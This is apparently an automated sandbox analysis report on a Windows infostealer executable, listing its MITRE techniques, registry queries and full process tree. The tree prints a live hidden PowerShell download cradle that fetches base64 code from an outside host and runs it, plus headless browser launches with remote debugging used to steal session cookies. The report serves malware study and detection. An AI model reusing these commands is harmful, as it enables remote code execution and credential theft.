037289c207c8e229d728f247c2d7eb1459fb4413fcd4fe662f74c711169a1e08

Analysis

max time kernel
122s
max time network
133s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
20/03/2025, 20:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

void/7ac644fc3b59f9ae6995a9cc57c39aee97ac89b3d25652c29c9a3269a02db2d2.exe
Size

214KB
MD5

d4791c1c75fb06fcd21665f57211f4b7
SHA1

217ff98cbed165b61818e64bfbfb35c11834fe99
SHA256

7ac644fc3b59f9ae6995a9cc57c39aee97ac89b3d25652c29c9a3269a02db2d2
SHA512

a4cc7c6290bb3fce35b92812b2eff9bc94de2397d9f59edf9fc4db94afe666ca7eb605bf65fd387e06d3b0e694a8198f1a29a373d4fa0861578d62ddbccc8e64
SSDEEP

3072:CPiUbLW99ZIGfsic0GC0dOiN2OPeyZU+gcdtA74Lw4bit2t81lenOMb6Kn3:CPiUbLW9lsZ0GC0dOUe/0Lw4tKho6K3

Score

8^/10

credential_access defense_evasion discovery execution spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	980	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
980	powershell.exe
980	powershell.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
1072	chrome.exe
4960	msedge.exe
1060	msedge.exe
4028	chrome.exe
1876	chrome.exe
4988	chrome.exe
3660	chrome.exe
2764	msedge.exe
2148	msedge.exe

Executes dropped EXE 1 IoCs

pid	Process
4872	app.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 7 IoCs

defense_evasion

pid	Process
4520	taskkill.exe
2708	taskkill.exe
536	taskkill.exe
456	taskkill.exe
3960	taskkill.exe
2512	taskkill.exe
4676	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133869758546135207"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-869607583-2483572573-2297019986-1000\{27CC37A3-F5C8-4A1E-8CE3-0E183EEE29FF}	msedge.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
980	powershell.exe
980	powershell.exe
4872	app.exe
4872	app.exe
4872	app.exe
4872	app.exe
4028	chrome.exe
4028	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4028	chrome.exe
4028	chrome.exe
4028	chrome.exe
4028	chrome.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	980	powershell.exe
Token: SeIncreaseQuotaPrivilege	2568	WMIC.exe
Token: SeSecurityPrivilege	2568	WMIC.exe
Token: SeTakeOwnershipPrivilege	2568	WMIC.exe
Token: SeLoadDriverPrivilege	2568	WMIC.exe
Token: SeSystemProfilePrivilege	2568	WMIC.exe
Token: SeSystemtimePrivilege	2568	WMIC.exe
Token: SeProfSingleProcessPrivilege	2568	WMIC.exe
Token: SeIncBasePriorityPrivilege	2568	WMIC.exe
Token: SeCreatePagefilePrivilege	2568	WMIC.exe
Token: SeBackupPrivilege	2568	WMIC.exe
Token: SeRestorePrivilege	2568	WMIC.exe
Token: SeShutdownPrivilege	2568	WMIC.exe
Token: SeDebugPrivilege	2568	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2568	WMIC.exe
Token: SeRemoteShutdownPrivilege	2568	WMIC.exe
Token: SeUndockPrivilege	2568	WMIC.exe
Token: SeManageVolumePrivilege	2568	WMIC.exe
Token: 33	2568	WMIC.exe
Token: 34	2568	WMIC.exe
Token: 35	2568	WMIC.exe
Token: 36	2568	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2568	WMIC.exe
Token: SeSecurityPrivilege	2568	WMIC.exe
Token: SeTakeOwnershipPrivilege	2568	WMIC.exe
Token: SeLoadDriverPrivilege	2568	WMIC.exe
Token: SeSystemProfilePrivilege	2568	WMIC.exe
Token: SeSystemtimePrivilege	2568	WMIC.exe
Token: SeProfSingleProcessPrivilege	2568	WMIC.exe
Token: SeIncBasePriorityPrivilege	2568	WMIC.exe
Token: SeCreatePagefilePrivilege	2568	WMIC.exe
Token: SeBackupPrivilege	2568	WMIC.exe
Token: SeRestorePrivilege	2568	WMIC.exe
Token: SeShutdownPrivilege	2568	WMIC.exe
Token: SeDebugPrivilege	2568	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2568	WMIC.exe
Token: SeRemoteShutdownPrivilege	2568	WMIC.exe
Token: SeUndockPrivilege	2568	WMIC.exe
Token: SeManageVolumePrivilege	2568	WMIC.exe
Token: 33	2568	WMIC.exe
Token: 34	2568	WMIC.exe
Token: 35	2568	WMIC.exe
Token: 36	2568	WMIC.exe
Token: SeDebugPrivilege	3960	taskkill.exe
Token: SeDebugPrivilege	2512	taskkill.exe
Token: SeShutdownPrivilege	4028	chrome.exe
Token: SeCreatePagefilePrivilege	4028	chrome.exe
Token: SeShutdownPrivilege	4028	chrome.exe
Token: SeCreatePagefilePrivilege	4028	chrome.exe
Token: SeShutdownPrivilege	4028	chrome.exe
Token: SeCreatePagefilePrivilege	4028	chrome.exe
Token: SeShutdownPrivilege	4028	chrome.exe
Token: SeCreatePagefilePrivilege	4028	chrome.exe
Token: SeDebugPrivilege	4676	taskkill.exe
Token: SeDebugPrivilege	4520	taskkill.exe
Token: SeDebugPrivilege	2708	taskkill.exe
Token: SeDebugPrivilege	536	taskkill.exe
Token: SeDebugPrivilege	456	taskkill.exe
Token: SeIncreaseQuotaPrivilege	216	wmic.exe
Token: SeSecurityPrivilege	216	wmic.exe
Token: SeTakeOwnershipPrivilege	216	wmic.exe
Token: SeLoadDriverPrivilege	216	wmic.exe
Token: SeSystemProfilePrivilege	216	wmic.exe
Token: SeSystemtimePrivilege	216	wmic.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4028	chrome.exe
4960	msedge.exe
4960	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3892 wrote to memory of 980	3892	7ac644fc3b59f9ae6995a9cc57c39aee97ac89b3d25652c29c9a3269a02db2d2.exe	88
PID 3892 wrote to memory of 980	3892	7ac644fc3b59f9ae6995a9cc57c39aee97ac89b3d25652c29c9a3269a02db2d2.exe	88
PID 980 wrote to memory of 4872	980	powershell.exe	94
PID 980 wrote to memory of 4872	980	powershell.exe	94
PID 4872 wrote to memory of 2608	4872	app.exe	95
PID 4872 wrote to memory of 2608	4872	app.exe	95
PID 2608 wrote to memory of 2568	2608	cmd.exe	97
PID 2608 wrote to memory of 2568	2608	cmd.exe	97
PID 4872 wrote to memory of 3960	4872	app.exe	98
PID 4872 wrote to memory of 3960	4872	app.exe	98
PID 4872 wrote to memory of 2512	4872	app.exe	100
PID 4872 wrote to memory of 2512	4872	app.exe	100
PID 4872 wrote to memory of 4028	4872	app.exe	102
PID 4872 wrote to memory of 4028	4872	app.exe	102
PID 4028 wrote to memory of 4600	4028	chrome.exe	103
PID 4028 wrote to memory of 4600	4028	chrome.exe	103
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 728	4028	chrome.exe	104
PID 4028 wrote to memory of 1592	4028	chrome.exe	105
PID 4028 wrote to memory of 1592	4028	chrome.exe	105
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107
PID 4028 wrote to memory of 2664	4028	chrome.exe	107

C:\Users\Admin\AppData\Local\Temp\void\7ac644fc3b59f9ae6995a9cc57c39aee97ac89b3d25652c29c9a3269a02db2d2.exe
"C:\Users\Admin\AppData\Local\Temp\void\7ac644fc3b59f9ae6995a9cc57c39aee97ac89b3d25652c29c9a3269a02db2d2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoP -NonI -ExecutionPolicy Bypass -Command " $mode='tradingview.'; $userAgent='gift-3.2'; $wallet='my'; $trading='/developer'; $AI='https://'; $developer=$AI+$mode+$wallet+$trading; $Response=Invoke-WebRequest -Uri $developer -UseBasicParsing -UserAgent $userAgent; $Content=$Response.Content; $t=$Content -replace '<[^>]*>', ''; $s=[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($t)); Invoke-Expression $s "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:980
- - C:\Users\Admin\AppData\Roaming\app.exe
    "C:\Users\Admin\AppData\Roaming\app.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4872
  - - C:\Windows\system32\cmd.exe
      "cmd" /C "wmic bios get manufacturer"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2608
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get manufacturer
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2568
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM brave.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3960
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM chrome.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2512
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\google\chrome\User Data"
      4⤵
      Uses browser remote debugging
      Checks processor information in registry
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:4028
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\google\chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\google\chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\google\chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc289dcf8,0x7fffc289dd04,0x7fffc289dd10
        5⤵
        
        PID:4600
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2004,i,6525852165695512123,2469491683497679193,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1996 /prefetch:2
        5⤵
        
        PID:728
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --field-trial-handle=2244,i,6525852165695512123,2469491683497679193,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2240 /prefetch:3
        5⤵
        
        PID:1592
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --field-trial-handle=2612,i,6525852165695512123,2469491683497679193,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2608 /prefetch:8
        5⤵
        
        PID:2664
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3636,i,6525852165695512123,2469491683497679193,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3632 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4988
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3660,i,6525852165695512123,2469491683497679193,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3656 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1876
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4400,i,6525852165695512123,2469491683497679193,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4396 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:1072
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4428,i,6525852165695512123,2469491683497679193,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4368 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3660
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --field-trial-handle=5172,i,6525852165695512123,2469491683497679193,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5168 /prefetch:8
        5⤵
        
        PID:4008
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\google\chrome\User Data" --field-trial-handle=5296,i,6525852165695512123,2469491683497679193,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5280 /prefetch:8
        5⤵
        
        PID:4740
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM chrome.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4676
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM msedge.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4520
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"
      4⤵
      Uses browser remote debugging
      Checks processor information in registry
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Modifies registry class
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:4960
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7fffb4c3f208,0x7fffb4c3f214,0x7fffb4c3f220
        5⤵
        
        PID:632
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2320,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2312 /prefetch:2
        5⤵
        
        PID:1148
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2352,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2348 /prefetch:3
        5⤵
        
        PID:4724
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2976,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2972 /prefetch:8
        5⤵
        
        PID:4624
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=3712,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3708 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2148
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3728,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3716 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2764
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4612,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4608 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:1060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4684,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:8
        5⤵
        
        PID:1456
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5248,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:8
        5⤵
        
        PID:1168
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5368,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:8
        5⤵
        
        PID:960
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5324,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5336 /prefetch:8
        5⤵
        
        PID:4160
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
